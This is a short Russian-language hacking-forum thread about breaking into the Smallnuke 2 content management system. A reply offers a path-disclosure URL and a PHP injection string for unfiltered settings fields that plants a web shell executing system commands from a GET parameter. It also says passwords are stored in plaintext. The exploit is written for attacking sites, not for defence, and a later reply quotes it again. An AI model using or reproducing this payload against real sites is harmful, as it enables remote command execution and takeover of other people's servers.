Форум АНТИЧАТ - Взлом Smallnuke 2. Возможно ли?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)

- - Взлом Smallnuke 2. Возможно ли? (https://forum.antichat.xyz/showthread.php?t=14938)

Взлом Smallnuke 2. Возможно ли?

Привет!
Кто то знает как поломать Smallnuke (www.smallnuke.com) ?

Эх я давно об этом мечтаю думаю кто-нибудь выложит уязвимости.

1) Раскрытие установочного пути:
index.php?go=Search&modname=test&query=E1it3 team
2) Возможность закачать webshell. Поля настройки никак не фильтруются, вводим в любое поле:
";if ($_GET['e13']) {system($_GET['e13']);exit;}$test="
и получаем шелл по адресу
index.php?e13=команда
По словам автора лучше помещать в ключевые слова сайта, это конечно же разумно.
3) Пароли пишутся в открытом виде.

Цитата:

2) Возможность закачать webshell. Поля настройки никак не фильтруются, вводим в любое поле:
";if ($_GET['e13']) {system($_GET['e13']);exit;}$test="
и получаем шелл по адресу
index.php?e13=команда

Воще бесполезная вигня. Если ты админ то только ты и сможешь замутить а так не как :(.